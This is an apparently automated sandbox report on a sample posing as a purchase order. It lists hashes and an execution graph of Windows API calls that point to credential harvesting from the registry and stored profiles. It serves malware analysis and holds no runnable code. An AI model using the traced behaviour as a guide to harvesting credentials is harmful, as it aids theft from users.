                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1961120804-0
                                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.4%
                                                                                                      Dynamic/Decrypted Code Coverage:19.9%
                                                                                                      Signature Coverage:0.5%
                                                                                                      Total number of Nodes:866
                                                                                                      Total number of Limit Nodes:21
                                                                                                      execution_graph 34110 40fc40 70 API calls 34284 403640 21 API calls 34111 427fa4 42 API calls 34285 412e43 _endthreadex 34286 425115 76 API calls __fprintf_l 34287 43fe40 133 API calls 34114 425115 83 API calls __fprintf_l 34115 401445 memcpy memcpy DialogBoxParamA 34116 440c40 34 API calls 34118 411853 RtlInitializeCriticalSection memset 34119 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34293 40a256 13 API calls 34295 432e5b 17 API calls 34297 43fa5a 20 API calls 34121 401060 41 API calls 34300 427260 CloseHandle memset memset 33181 410c68 FindResourceA 33182 410c81 SizeofResource 33181->33182 33184 410cae 33181->33184 33183 410c92 LoadResource 33182->33183 33182->33184 33183->33184 33185 410ca0 LockResource 33183->33185 33185->33184 34302 405e69 14 API calls 34126 433068 15 API calls __fprintf_l 34304 414a6d 18 API calls 34305 43fe6f 134 API calls 34128 424c6d 15 API calls __fprintf_l 34306 426741 19 API calls 34130 440c70 17 API calls 34131 443c71 44 API calls 34134 427c79 24 API calls 34309 416e7e memset __fprintf_l 34138 42800b 47 API calls 34139 425115 85 API calls __fprintf_l 34312 41960c 61 API calls 34140 43f40c 122 API calls __fprintf_l 34143 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34144 43f81a 20 API calls 34146 414c20 memset memset 34147 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34316 414625 18 API calls 34317 404225 modf 34318 403a26 strlen WriteFile 34320 40422a 12 API calls 34324 427632 memset memset memcpy 34325 40ca30 59 API calls 34326 404235 26 API calls 34148 42ec34 61 API calls __fprintf_l 34149 425115 76 API calls __fprintf_l 34327 425115 77 API calls __fprintf_l 34329 44223a 38 API calls 34155 43183c 112 API calls 34330 44b2c5 _onexit __dllonexit 34335 42a6d2 memcpy __allrem 34157 405cda 65 API calls 34343 43fedc 138 API calls 34344 4116e1 16 API calls __fprintf_l 34160 4244e6 19 API calls 34162 42e8e8 127 API calls __fprintf_l 34163 4118ee RtlLeaveCriticalSection 34349 43f6ec 22 API calls 34165 425115 119 API calls __fprintf_l 33171 410cf3 EnumResourceNamesA 34352 4492f0 memcpy memcpy 34354 43fafa 18 API calls 34356 4342f9 15 API calls __fprintf_l 34166 4144fd 19 API calls 34358 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34359 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34362 443a84 _mbscpy 34364 43f681 17 API calls 34169 404487 22 API calls 34366 415e8c 16 API calls __fprintf_l 34173 411893 RtlDeleteCriticalSection __fprintf_l 34174 41a492 42 API calls 34370 403e96 34 API calls 34371 410e98 memset SHGetPathFromIDList SendMessageA 34176 426741 109 API calls __fprintf_l 34177 4344a2 18 API calls 34178 4094a2 10 API calls 34180 4108a4 7 API calls 34374 4116a6 15 API calls __fprintf_l 34375 43f6a4 17 API calls 34376 440aa3 20 API calls 34378 427430 45 API calls 34182 4090b0 7 API calls 34183 4148b0 15 API calls 34185 4118b4 RtlEnterCriticalSection 34186 4014b7 CreateWindowExA 34187 40c8b8 19 API calls 34189 4118bf RtlTryEnterCriticalSection 34383 42434a 18 API calls __fprintf_l 34385 405f53 12 API calls 34197 43f956 59 API calls 34199 40955a 17 API calls 34200 428561 36 API calls 34201 409164 7 API calls 34389 404366 19 API calls 34393 40176c ExitProcess 34396 410777 42 API calls 34206 40dd7b 51 API calls 34207 425d7c 16 API calls __fprintf_l 34398 43f6f0 25 API calls 34399 42db01 22 API calls 34208 412905 15 API calls __fprintf_l 34400 403b04 54 API calls 34401 405f04 SetDlgItemTextA GetDlgItemTextA 34402 44b301 ??3@YAXPAX 34405 4120ea 14 API calls 3 library calls 34406 40bb0a 8 API calls 34408 413f11 strcmp 34212 434110 17 API calls __fprintf_l 34215 425115 108 API calls __fprintf_l 34409 444b11 _onexit 34217 425115 76 API calls __fprintf_l 34220 429d19 10 API calls 34412 444b1f __dllonexit 34413 409f20 _strcmpi 34222 42b927 31 API calls 34416 433f26 19 API calls __fprintf_l 34417 44b323 FreeLibrary 34418 427f25 46 API calls 34419 43ff2b 17 API calls 34420 43fb30 19 API calls 34229 414d36 16 API calls 34231 40ad38 7 API calls 34422 433b38 16 API calls __fprintf_l 34101 44b33b 34102 44b344 ??3@YAXPAX 34101->34102 34103 44b34b 34101->34103 34102->34103 34104 44b354 ??3@YAXPAX 34103->34104 34105 44b35b 34103->34105 34104->34105 34106 44b364 ??3@YAXPAX 34105->34106 34107 44b36b 34105->34107 34106->34107 34108 44b374 ??3@YAXPAX 34107->34108 34109 44b37b 34107->34109 34108->34109 34235 426741 21 API calls 34236 40c5c3 125 API calls 34238 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34241 4161cb memcpy memcpy memcpy memcpy 33186 44b3cf 33187 44b3e6 33186->33187 33192 44b454 33186->33192 33187->33192 33199 44b40e GetModuleHandleA 33187->33199 33189 44b45d GetModuleHandleA 33193 44b467 33189->33193 33190 44b49a 33212 44b49f 33190->33212 33192->33189 33192->33190 33192->33193 33193->33192 33194 44b487 GetProcAddress 33193->33194 33194->33192 33195 44b405 33195->33192 33195->33193 33196 44b428 GetProcAddress 33195->33196 33196->33192 33197 44b435 VirtualProtect 33196->33197 33197->33192 33198 44b444 VirtualProtect 33197->33198 33198->33192 33200 44b417 33199->33200 33202 44b454 33199->33202 33231 44b42b GetProcAddress 33200->33231 33204 44b45d GetModuleHandleA 33202->33204 33205 44b49a 33202->33205 33211 44b467 33202->33211 33203 44b41c 33203->33202 33207 44b428 GetProcAddress 33203->33207 33204->33211 33206 44b49f 771 API calls 33205->33206 33206->33205 33207->33202 33208 44b435 VirtualProtect 33207->33208 33208->33202 33209 44b444 VirtualProtect 33208->33209 33209->33202 33210 44b487 GetProcAddress 33210->33202 33211->33202 33211->33210 33213 444c4a 33212->33213 33214 444c56 GetModuleHandleA 33213->33214 33215 444c68 __set_app_type __p__fmode __p__commode 33214->33215 33217 444cfa 33215->33217 33218 444d02 __setusermatherr 33217->33218 33219 444d0e 33217->33219 33218->33219 33240 444e22 _controlfp 33219->33240 33221 444d13 _initterm __getmainargs _initterm 33222 444d6a GetStartupInfoA 33221->33222 33224 444d9e GetModuleHandleA 33222->33224 33241 40cf44 33224->33241 33228 444dcf _cexit 33230 444e04 33228->33230 33229 444dc8 exit 33229->33228 33230->33190 33232 44b454 33231->33232 33233 44b435 VirtualProtect 33231->33233 33235 44b45d GetModuleHandleA 33232->33235 33236 44b49a 33232->33236 33233->33232 33234 44b444 VirtualProtect 33233->33234 33234->33232 33239 44b467 33235->33239 33237 44b49f 771 API calls 33236->33237 33237->33236 33238 44b487 GetProcAddress 33238->33239 33239->33232 33239->33238 33240->33221 33292 404a99 LoadLibraryA 33241->33292 33243 40cf60 33278 40cf64 33243->33278 33299 410d0e 33243->33299 33245 40cf6f 33303 40ccd7 ??2@YAPAXI 33245->33303 33247 40cf9b 33317 407cbc 33247->33317 33252 40cfc4 33335 409825 memset 33252->33335 33253 40cfd8 33340 4096f4 memset 33253->33340 33258 40d181 ??3@YAXPAX 33260 40d1b3 33258->33260 33261 40d19f DeleteObject 33258->33261 33259 407e30 _strcmpi 33262 40cfee 33259->33262 33364 407948 free free 33260->33364 33261->33260 33264 40cff2 RegDeleteKeyA 33262->33264 33265 40d007 EnumResourceTypesA 33262->33265 33264->33258 33267 40d02f MessageBoxA 33265->33267 33270 40d047 33265->33270 33266 40d1c4 33365 4080d4 free 33266->33365 33267->33258 33269 40d0a0 CoInitialize 33362 40cc26 strncat memset RegisterClassA CreateWindowExA 33269->33362 33270->33269 33345 40ce70 33270->33345 33272 40d1cd 33366 407948 free free 33272->33366 33274 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33363 40c256 PostMessageA 33274->33363 33278->33228 33278->33229 33279 40d061 ??3@YAXPAX 33279->33260 33282 40d084 DeleteObject 33279->33282 33280 40d09e 33280->33269 33282->33260 33284 40d0f9 GetMessageA 33285 40d17b CoUninitialize 33284->33285 33286 40d10d 33284->33286 33285->33258 33287 40d113 TranslateAccelerator 33286->33287 33289 40d145 IsDialogMessage 33286->33289 33290 40d139 IsDialogMessage 33286->33290 33287->33286 33288 40d16d GetMessageA 33287->33288 33288->33285 33288->33287 33289->33288 33291 40d157 TranslateMessage DispatchMessageA 33289->33291 33290->33288 33290->33289 33291->33288 33293 404ac4 GetProcAddress 33292->33293 33294 404ae8 33292->33294 33295 404ad4 33293->33295 33296 404add FreeLibrary 33293->33296 33297 404b13 33294->33297 33298 404afc MessageBoxA 33294->33298 33295->33296 33296->33294 33297->33243 33298->33243 33300 410d17 LoadLibraryA 33299->33300 33301 410d3c 33299->33301 33300->33301 33302 410d2b GetProcAddress 33300->33302 33301->33245 33302->33301 33304 40cd08 ??2@YAPAXI 33303->33304 33306 40cd26 33304->33306 33307 40cd2d 33304->33307 33374 404025 6 API calls 33306->33374 33309 40cd66 33307->33309 33310 40cd59 DeleteObject 33307->33310 33367 407088 33309->33367 33310->33309 33312 40cd6b 33370 4019b5 33312->33370 33315 4019b5 strncat 33316 40cdbf _mbscpy 33315->33316 33316->33247 33376 407948 free free 33317->33376 33321 407a1f malloc memcpy free free 33324 407cf7 33321->33324 33322 407ddc 33330 407e04 33322->33330 33389 407a1f 33322->33389 33324->33321 33324->33322 33325 407d7a free 33324->33325 33324->33330 33380 40796e 7 API calls 33324->33380 33381 406f30 33324->33381 33325->33324 33377 407a55 33330->33377 33331 407e30 33332 407e57 33331->33332 33333 407e38 33331->33333 33332->33252 33332->33253 33333->33332 33334 407e41 _strcmpi 33333->33334 33334->33332 33334->33333 33395 4097ff 33335->33395 33337 409854 33400 409731 33337->33400 33341 4097ff 3 API calls 33340->33341 33342 409723 33341->33342 33420 40966c 33342->33420 33434 4023b2 33345->33434 33351 40ced3 33523 40cdda 7 API calls 33351->33523 33352 40cece 33355 40cf3f 33352->33355 33475 40c3d0 memset GetModuleFileNameA strrchr 33352->33475 33355->33279 33355->33280 33358 40ceed 33502 40affa 33358->33502 33362->33274 33363->33284 33364->33266 33365->33272 33366->33278 33375 406fc7 memset _mbscpy 33367->33375 33369 40709f CreateFontIndirectA 33369->33312 33371 4019e1 33370->33371 33372 4019c2 strncat 33371->33372 33373 4019e5 memset LoadIconA 33371->33373 33372->33371 33373->33315 33374->33307 33375->33369 33376->33324 33378 407a65 33377->33378 33379 407a5b free 33377->33379 33378->33331 33379->33378 33380->33324 33382 406f37 malloc 33381->33382 33383 406f7d 33381->33383 33385 406f73 33382->33385 33386 406f58 33382->33386 33383->33324 33385->33324 33387 406f6c free 33386->33387 33388 406f5c memcpy 33386->33388 33387->33385 33388->33387 33390 407a38 33389->33390 33391 407a2d free 33389->33391 33392 406f30 3 API calls 33390->33392 33393 407a43 33391->33393 33392->33393 33394 40796e 7 API calls 33393->33394 33394->33330 33411 406f96 GetModuleFileNameA 33395->33411 33397 409805 strrchr 33398 409814 33397->33398 33399 409817 _mbscat 33397->33399 33398->33399 33399->33337 33412 44b090 33400->33412 33405 40930c 3 API calls 33406 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33405->33406 33407 4097c5 LoadStringA 33406->33407 33408 4097db 33407->33408 33408->33407 33410 4097f3 33408->33410 33419 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33408->33419 33410->33258 33411->33397 33413 40973e _mbscpy _mbscpy 33412->33413 33414 40930c 33413->33414 33415 44b090 33414->33415 33416 409319 memset GetPrivateProfileStringA 33415->33416 33417 409374 33416->33417 33418 409364 WritePrivateProfileStringA 33416->33418 33417->33405 33418->33417 33419->33408 33430 406f81 GetFileAttributesA 33420->33430 33422 409675 33423 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33422->33423 33429 4096ee 33422->33429 33431 409278 GetPrivateProfileStringA 33423->33431 33425 4096c9 33432 409278 GetPrivateProfileStringA 33425->33432 33427 4096da 33433 409278 GetPrivateProfileStringA 33427->33433 33429->33259 33430->33422 33431->33425 33432->33427 33433->33429 33525 409c1c 33434->33525 33437 401e69 memset 33564 410dbb 33437->33564 33440 401ec2 33594 4070e3 strlen _mbscat _mbscpy _mbscat 33440->33594 33441 401ed4 33579 406f81 GetFileAttributesA 33441->33579 33444 401ee6 strlen strlen 33446 401f15 33444->33446 33447 401f28 33444->33447 33595 4070e3 strlen _mbscat _mbscpy _mbscat 33446->33595 33580 406f81 GetFileAttributesA 33447->33580 33450 401f35 33581 401c31 33450->33581 33453 401f75 33593 410a9c RegOpenKeyExA 33453->33593 33455 401c31 7 API calls 33455->33453 33456 401f91 33457 402187 33456->33457 33458 401f9c memset 33456->33458 33460 402195 ExpandEnvironmentStringsA 33457->33460 33461 4021a8 _strcmpi 33457->33461 33596 410b62 RegEnumKeyExA 33458->33596 33605 406f81 GetFileAttributesA 33460->33605 33461->33351 33461->33352 33463 40217e RegCloseKey 33463->33457 33464 401fd9 atoi 33465 401fef memset memset sprintf 33464->33465 33473 401fc9 33464->33473 33597 410b1e 33465->33597 33468 402165 33468->33463 33469 406f81 GetFileAttributesA 33469->33473 33470 402076 memset memset strlen strlen 33470->33473 33471 4070e3 strlen _mbscat _mbscpy _mbscat 33471->33473 33472 4020dd strlen strlen 33472->33473 33473->33463 33473->33464 33473->33468 33473->33469 33473->33470 33473->33471 33473->33472 33474 402167 _mbscpy 33473->33474 33604 410b62 RegEnumKeyExA 33473->33604 33474->33463 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33626 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33626 33480->33479 33619 409b31 33481->33619 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33629 406c62 LoadCursorA SetCursor 33486->33629 33488 40ba8c 33630 4107f1 33488->33630 33633 410a9c RegOpenKeyExA 33488->33633 33634 404734 33488->33634 33642 404785 33488->33642 33645 403c16 33488->33645 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33721 40b5e5 10 API calls 33492->33721 33493 40bafa SetCursor 33493->33358 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 34076 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33502->34076 33504 40b00e 33505 40b016 33504->33505 33506 40b01f GetStdHandle 33504->33506 34077 406d1a CreateFileA 33505->34077 33508 40b01c 33506->33508 33509 40b035 33508->33509 33510 40b12d 33508->33510 34078 406c62 LoadCursorA SetCursor 33509->34078 34082 406d77 9 API calls 33510->34082 33513 40b136 33524 40c580 28 API calls 33513->33524 33514 40b087 33515 40b0a1 33514->33515 34080 40a699 12 API calls 33514->34080 33519 40b0d6 33515->33519 34081 406d77 9 API calls 33515->34081 33516 40b042 33516->33514 33516->33515 34079 40a57c strlen WriteFile 33516->34079 33520 40b116 CloseHandle 33519->33520 33521 40b11f SetCursor 33519->33521 33520->33521 33521->33513 33523->33352 33524->33355 33537 409a32 33525->33537 33528 409c80 memcpy memcpy 33529 409cda 33528->33529 33529->33528 33530 409d18 ??2@YAPAXI ??2@YAPAXI 33529->33530 33534 408db6 12 API calls 33529->33534 33531 409d54 ??2@YAPAXI 33530->33531 33533 409d8b 33530->33533 33531->33533 33547 409b9c 33533->33547 33534->33529 33536 4023c1 33536->33437 33538 409a44 33537->33538 33539 409a3d ??3@YAXPAX 33537->33539 33540 409a52 33538->33540 33541 409a4b ??3@YAXPAX 33538->33541 33539->33538 33542 409a63 33540->33542 33543 409a5c ??3@YAXPAX 33540->33543 33541->33540 33544 409a83 ??2@YAPAXI ??2@YAPAXI 33542->33544 33545 409a73 ??3@YAXPAX 33542->33545 33546 409a7c ??3@YAXPAX 33542->33546 33543->33542 33544->33528 33545->33546 33546->33544 33548 407a55 free 33547->33548 33549 409ba5 33548->33549 33550 407a55 free 33549->33550 33551 409bad 33550->33551 33552 407a55 free 33551->33552 33553 409bb5 33552->33553 33554 407a55 free 33553->33554 33555 409bbd 33554->33555 33556 407a1f 4 API calls 33555->33556 33557 409bd0 33556->33557 33558 407a1f 4 API calls 33557->33558 33559 409bda 33558->33559 33560 407a1f 4 API calls 33559->33560 33561 409be4 33560->33561 33562 407a1f 4 API calls 33561->33562 33563 409bee 33562->33563 33563->33536 33565 410d0e 2 API calls 33564->33565 33566 410dca 33565->33566 33567 410dfd memset 33566->33567 33606 4070ae 33566->33606 33568 410e1d 33567->33568 33609 410a9c RegOpenKeyExA 33568->33609 33572 401e9e strlen strlen 33572->33440 33572->33441 33573 410e4a 33574 410e7f _mbscpy 33573->33574 33610 410d3d _mbscpy 33573->33610 33574->33572 33576 410e5b 33611 410add RegQueryValueExA 33576->33611 33578 410e73 RegCloseKey 33578->33574 33579->33444 33580->33450 33612 410a9c RegOpenKeyExA 33581->33612 33583 401c4c 33584 401cad 33583->33584 33613 410add RegQueryValueExA 33583->33613 33584->33453 33584->33455 33586 401c6a 33587 401c71 strchr 33586->33587 33588 401ca4 RegCloseKey 33586->33588 33587->33588 33589 401c85 strchr 33587->33589 33588->33584 33589->33588 33590 401c94 33589->33590 33614 406f06 strlen 33590->33614 33592 401ca1 33592->33588 33593->33456 33594->33441 33595->33447 33596->33473 33617 410a9c RegOpenKeyExA 33597->33617 33599 410b34 33600 410b5d 33599->33600 33618 410add RegQueryValueExA 33599->33618 33600->33473 33602 410b4c RegCloseKey 33602->33600 33604->33473 33605->33461 33607 4070bd GetVersionExA 33606->33607 33608 4070ce 33606->33608 33607->33608 33608->33567 33608->33572 33609->33573 33610->33576 33611->33578 33612->33583 33613->33586 33615 406f17 33614->33615 33616 406f1a memcpy 33614->33616 33615->33616 33616->33592 33617->33599 33618->33602 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33485 33628 409868 SendMessageA 33624->33628 33626->33481 33627->33622 33628->33623 33629->33488 33631 410807 33630->33631 33632 4107fc FreeLibrary 33630->33632 33631->33490 33632->33631 33633->33490 33635 404785 FreeLibrary 33634->33635 33636 40473b LoadLibraryA 33635->33636 33637 40474c GetProcAddress 33636->33637 33638 40476e 33636->33638 33637->33638 33639 404764 33637->33639 33640 404781 33638->33640 33641 404785 FreeLibrary 33638->33641 33639->33638 33640->33490 33641->33640 33643 4047a3 33642->33643 33644 404799 FreeLibrary 33642->33644 33643->33490 33644->33643 33646 4107f1 FreeLibrary 33645->33646 33647 403c30 LoadLibraryA 33646->33647 33648 403c74 33647->33648 33649 403c44 GetProcAddress 33647->33649 33650 4107f1 FreeLibrary 33648->33650 33649->33648 33651 403c5e 33649->33651 33652 403c7b 33650->33652 33651->33648 33655 403c6b 33651->33655 33653 404734 3 API calls 33652->33653 33654 403c86 33653->33654 33722 4036e5 33654->33722 33655->33652 33658 4036e5 23 API calls 33659 403c9a 33658->33659 33660 4036e5 23 API calls 33659->33660 33661 403ca4 33660->33661 33662 4036e5 23 API calls 33661->33662 33663 403cae 33662->33663 33732 4085d2 33663->33732 33671 403ce5 33672 403cf7 33671->33672 33913 402bd1 40 API calls 33671->33913 33778 410a9c RegOpenKeyExA 33672->33778 33675 403d0a 33676 403d1c 33675->33676 33914 402bd1 40 API calls 33675->33914 33779 402c5d 33676->33779 33680 4070ae GetVersionExA 33681 403d31 33680->33681 33797 410a9c RegOpenKeyExA 33681->33797 33683 403d51 33684 403d61 33683->33684 33915 402b22 47 API calls 33683->33915 33798 410a9c RegOpenKeyExA 33684->33798 33687 403d87 33690 403d97 33687->33690 33916 402b22 47 API calls 33687->33916 33799 410a9c RegOpenKeyExA 33690->33799 33691 403dbd 33692 403dcd 33691->33692 33917 402b22 47 API calls 33691->33917 33800 410808 33692->33800 33696 404785 FreeLibrary 33697 403de8 33696->33697 33804 402fdb 33697->33804 33700 402fdb 34 API calls 33701 403e00 33700->33701 33820 4032b7 33701->33820 33710 403e3b 33712 403e73 33710->33712 33713 403e46 _mbscpy 33710->33713 33867 40fb00 33712->33867 33919 40f334 334 API calls 33713->33919 33721->33492 33723 4036fb 33722->33723 33724 4037c5 33722->33724 33723->33724 33725 403716 strchr 33723->33725 33724->33658 33725->33724 33726 403730 33725->33726 33920 4021b6 memset 33726->33920 33728 40373f _mbscpy _mbscpy strlen 33729 4037a4 _mbscpy 33728->33729 33730 403789 sprintf 33728->33730 33921 4023e5 16 API calls 33729->33921 33730->33729 33733 4085e2 33732->33733 33922 4082cd 11 API calls 33733->33922 33737 408600 33738 403cba 33737->33738 33739 40860b memset 33737->33739 33750 40821d 33738->33750 33925 410b62 RegEnumKeyExA 33739->33925 33741 408637 33742 4086d2 RegCloseKey 33741->33742 33744 40865c memset 33741->33744 33926 410a9c RegOpenKeyExA 33741->33926 33929 410b62 RegEnumKeyExA 33741->33929 33742->33738 33927 410add RegQueryValueExA 33744->33927 33747 408694 33928 40848b 10 API calls 33747->33928 33749 4086ab RegCloseKey 33749->33741 33930 410a9c RegOpenKeyExA 33750->33930 33752 40823f 33753 403cc6 33752->33753 33754 408246 memset 33752->33754 33762 4086e0 33753->33762 33931 410b62 RegEnumKeyExA 33754->33931 33756 4082bf RegCloseKey 33756->33753 33758 40826f 33758->33756 33932 410a9c RegOpenKeyExA 33758->33932 33933 4080ed 11 API calls 33758->33933 33934 410b62 RegEnumKeyExA 33758->33934 33761 4082a2 RegCloseKey 33761->33758 33935 4045db 33762->33935 33767 408737 wcslen 33768 4088ef 33767->33768 33774 40876a 33767->33774 33943 404656 33768->33943 33769 40877a wcsncmp 33769->33774 33771 404734 3 API calls 33771->33774 33772 404785 FreeLibrary 33772->33774 33773 408812 memset 33773->33774 33775 40883c memcpy wcschr 33773->33775 33774->33768 33774->33769 33774->33771 33774->33772 33774->33773 33774->33775 33776 4088c3 LocalFree 33774->33776 33946 40466b _mbscpy 33774->33946 33775->33774 33776->33774 33777 410a9c RegOpenKeyExA 33777->33671 33778->33675 33947 410a9c RegOpenKeyExA 33779->33947 33781 402c7a 33782 402da5 33781->33782 33783 402c87 memset 33781->33783 33782->33680 33948 410b62 RegEnumKeyExA 33783->33948 33785 402d9c RegCloseKey 33785->33782 33786 402cb2 33786->33785 33787 410b1e 3 API calls 33786->33787 33796 402d9a 33786->33796 33952 402bd1 40 API calls 33786->33952 33953 410b62 RegEnumKeyExA 33786->33953 33788 402ce4 memset sprintf 33787->33788 33949 410a9c RegOpenKeyExA 33788->33949 33790 402d28 33791 402d3a sprintf 33790->33791 33950 402bd1 40 API calls 33790->33950 33951 410a9c RegOpenKeyExA 33791->33951 33796->33785 33797->33683 33798->33687 33799->33691 33801 410816 33800->33801 33802 4107f1 FreeLibrary 33801->33802 33803 403ddd 33802->33803 33803->33696 33954 410a9c RegOpenKeyExA 33804->33954 33806 402ff9 33807 403006 memset 33806->33807 33808 40312c 33806->33808 33955 410b62 RegEnumKeyExA 33807->33955 33808->33700 33810 403033 33811 403122 RegCloseKey 33810->33811 33812 410b1e 3 API calls 33810->33812 33815 4030a2 memset 33810->33815 33817 410b62 RegEnumKeyExA 33810->33817 33818 4030f9 RegCloseKey 33810->33818 33958 402db3 26 API calls 33810->33958 33811->33808 33813 403058 memset sprintf 33812->33813 33956 410a9c RegOpenKeyExA 33813->33956 33957 410b62 RegEnumKeyExA 33815->33957 33817->33810 33818->33810 33821 4032d5 33820->33821 33822 4033a9 33820->33822 33959 4021b6 memset 33821->33959 33835 4034e4 memset memset 33822->33835 33824 4032e1 33960 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33824->33960 33826 4032ea 33827 4032f8 memset GetPrivateProfileSectionA 33826->33827 33961 4023e5 16 API calls 33826->33961 33827->33822 33832 40332f 33827->33832 33829 40339b strlen 33829->33822 33829->33832 33831 403350 strchr 33831->33832 33832->33822 33832->33829 33962 4021b6 memset 33832->33962 33963 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33832->33963 33964 4023e5 16 API calls 33832->33964 33836 410b1e 3 API calls 33835->33836 33837 40353f 33836->33837 33838 40357f 33837->33838 33839 403546 _mbscpy 33837->33839 33843 403985 33838->33843 33965 406d55 strlen _mbscat 33839->33965 33841 403565 _mbscat 33966 4033f0 19 API calls 33841->33966 33967 40466b _mbscpy 33843->33967 33845 4039aa 33849 4039ff 33845->33849 33968 40f460 memset memset 33845->33968 33989 40f6e2 33845->33989 34005 4038e8 21 API calls 33845->34005 33850 404785 FreeLibrary 33849->33850 33851 403a0b 33850->33851 33852 4037ca memset memset 33851->33852 34013 444551 memset 33852->34013 33855 4038e2 33855->33710 33918 40f334 334 API calls 33855->33918 33857 40382e 33858 406f06 2 API calls 33857->33858 33859 403843 33858->33859 33860 406f06 2 API calls 33859->33860 33861 403855 strchr 33860->33861 33862 403884 _mbscpy 33861->33862 33863 403897 strlen 33861->33863 33864 4038bf _mbscpy 33862->33864 33863->33864 33865 4038a4 sprintf 33863->33865 34025 4023e5 16 API calls 33864->34025 33865->33864 33868 44b090 33867->33868 33869 40fb10 RegOpenKeyExA 33868->33869 33870 403e7f 33869->33870 33871 40fb3b RegOpenKeyExA 33869->33871 33881 40f96c 33870->33881 33872 40fb55 RegQueryValueExA 33871->33872 33873 40fc2d RegCloseKey 33871->33873 33874 40fc23 RegCloseKey 33872->33874 33875 40fb84 33872->33875 33873->33870 33874->33873 33876 404734 3 API calls 33875->33876 33877 40fb91 33876->33877 33877->33874 33878 40fc19 LocalFree 33877->33878 33879 40fbdd memcpy memcpy 33877->33879 33878->33874 34030 40f802 11 API calls 33879->34030 33882 4070ae GetVersionExA 33881->33882 33883 40f98d 33882->33883 33884 4045db 7 API calls 33883->33884 33892 40f9a9 33884->33892 33885 40fae6 33886 404656 FreeLibrary 33885->33886 33887 403e85 33886->33887 33893 4442ea memset 33887->33893 33888 40fa13 memset WideCharToMultiByte 33889 40fa43 _strnicmp 33888->33889 33888->33892 33890 40fa5b WideCharToMultiByte 33889->33890 33889->33892 33891 40fa88 WideCharToMultiByte 33890->33891 33890->33892 33891->33892 33892->33885 33892->33888 33894 410dbb 9 API calls 33893->33894 33895 444329 33894->33895 34031 40759e strlen strlen 33895->34031 33900 410dbb 9 API calls 33901 444350 33900->33901 33902 40759e 3 API calls 33901->33902 33903 44435a 33902->33903 33904 444212 65 API calls 33903->33904 33905 444366 memset memset 33904->33905 33906 410b1e 3 API calls 33905->33906 33907 4443b9 ExpandEnvironmentStringsA strlen 33906->33907 33908 4443f4 _strcmpi 33907->33908 33909 4443e5 33907->33909 33910 403e91 33908->33910 33911 44440c 33908->33911 33909->33908 33910->33490 33912 444212 65 API calls 33911->33912 33912->33910 33913->33672 33914->33676 33915->33684 33916->33690 33917->33692 33918->33710 33919->33712 33920->33728 33921->33724 33923 40841c 33922->33923 33924 410a9c RegOpenKeyExA 33923->33924 33924->33737 33925->33741 33926->33741 33927->33747 33928->33749 33929->33741 33930->33752 33931->33758 33932->33758 33933->33761 33934->33758 33936 404656 FreeLibrary 33935->33936 33937 4045e3 LoadLibraryA 33936->33937 33938 404651 33937->33938 33939 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33937->33939 33938->33767 33938->33768 33940 40463d 33939->33940 33941 404643 33940->33941 33942 404656 FreeLibrary 33940->33942 33941->33938 33942->33938 33944 403cd2 33943->33944 33945 40465c FreeLibrary 33943->33945 33944->33777 33945->33944 33946->33774 33947->33781 33948->33786 33949->33790 33950->33791 33951->33786 33952->33786 33953->33786 33954->33806 33955->33810 33956->33810 33957->33810 33958->33810 33959->33824 33960->33826 33961->33827 33962->33831 33963->33832 33964->33832 33965->33841 33966->33838 33967->33845 34006 4078ba 33968->34006 33971 4078ba _mbsnbcat 33972 40f5a3 RegOpenKeyExA 33971->33972 33973 40f5c3 RegQueryValueExA 33972->33973 33974 40f6d9 33972->33974 33975 40f6d0 RegCloseKey 33973->33975 33976 40f5f0 33973->33976 33974->33845 33975->33974 33976->33975 33977 40f675 33976->33977 34010 40466b _mbscpy 33976->34010 33977->33975 34011 4012ee strlen 33977->34011 33979 40f611 33981 404734 3 API calls 33979->33981 33986 40f616 33981->33986 33982 40f69e RegQueryValueExA 33982->33975 33983 40f6c1 33982->33983 33983->33975 33984 40f66a 33985 404785 FreeLibrary 33984->33985 33985->33977 33986->33984 33987 40f661 LocalFree 33986->33987 33988 40f645 memcpy 33986->33988 33987->33984 33988->33987 34012 40466b _mbscpy 33989->34012 33991 40f6fa 33992 